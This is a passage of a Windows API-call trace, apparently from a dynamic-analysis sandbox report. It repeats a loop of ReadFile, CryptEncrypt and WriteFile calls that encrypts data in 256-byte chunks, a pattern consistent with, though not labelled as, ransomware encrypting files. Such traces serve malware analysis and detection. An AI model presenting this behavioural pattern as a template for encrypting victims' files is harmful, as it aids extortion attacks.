lpOverlapped=0x0) returned 1 [0144.637] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.637] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.637] GetLastError () returned 0x0 [0144.637] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.637] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.637] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.637] GetLastError () returned 0x0 [0144.637] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.637] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.637] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.638] GetLastError () returned 0x0 [0144.638] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.638] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.638] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.638] GetLastError () returned 0x0 [0144.638] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.638] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.638] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.638] GetLastError () returned 0x0 [0144.638] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.638] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.638] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.638] GetLastError () returned 0x0 [0144.638] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.638] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.638] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.638] GetLastError () returned 0x0 [0144.638] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.638] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.650] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.650] GetLastError () returned 0x0 [0144.650] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.650] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.650] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.650] GetLastError () returned 0x0 [0144.650] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.650] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.650] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.650] GetLastError () returned 0x0 [0144.650] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.650] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.650] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.651] GetLastError () returned 0x0 [0144.651] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.651] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.651] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.651] GetLastError () returned 0x0 [0144.651] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.651] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.651] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.651] GetLastError () returned 0x0 [0144.651] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.651] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.651] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.651] GetLastError () returned 0x0 [0144.651] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.651] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.651] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.651] GetLastError () returned 0x0 [0144.651] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.651] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.651] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.651] GetLastError () returned 0x0 [0144.651] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.651] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.651] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.651] GetLastError () returned 0x0 [0144.651] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.652] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.652] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.652] GetLastError () returned 0x0 [0144.652] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.652] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.652] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.652] GetLastError () returned 0x0 [0144.652] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.652] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.652] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.652] GetLastError () returned 0x0 [0144.652] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.652] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.652] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.652] GetLastError () returned 0x0 [0144.652] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.652] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.652] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.652] GetLastError () returned 0x0 [0144.652] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.652] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.652] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.652] GetLastError () returned 0x0 [0144.652] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.653] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.653] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.653] GetLastError () returned 0x0 [0144.653] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.653] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.653] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.653] GetLastError () returned 0x0 [0144.653] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.653] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.653] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.653] GetLastError () returned 0x0 [0144.653] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.653] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.653] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.653] GetLastError () returned 0x0 [0144.653] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.654] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.654] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.654] GetLastError () returned 0x0 [0144.654] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.654] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.654] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.654] GetLastError () returned 0x0 [0144.654] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.654] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.654] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.654] GetLastError () returned 0x0 [0144.654] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.654] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.654] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.654] GetLastError () returned 0x0 [0144.654] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.654] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.654] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.654] GetLastError () returned 0x0 [0144.654] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.654] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: 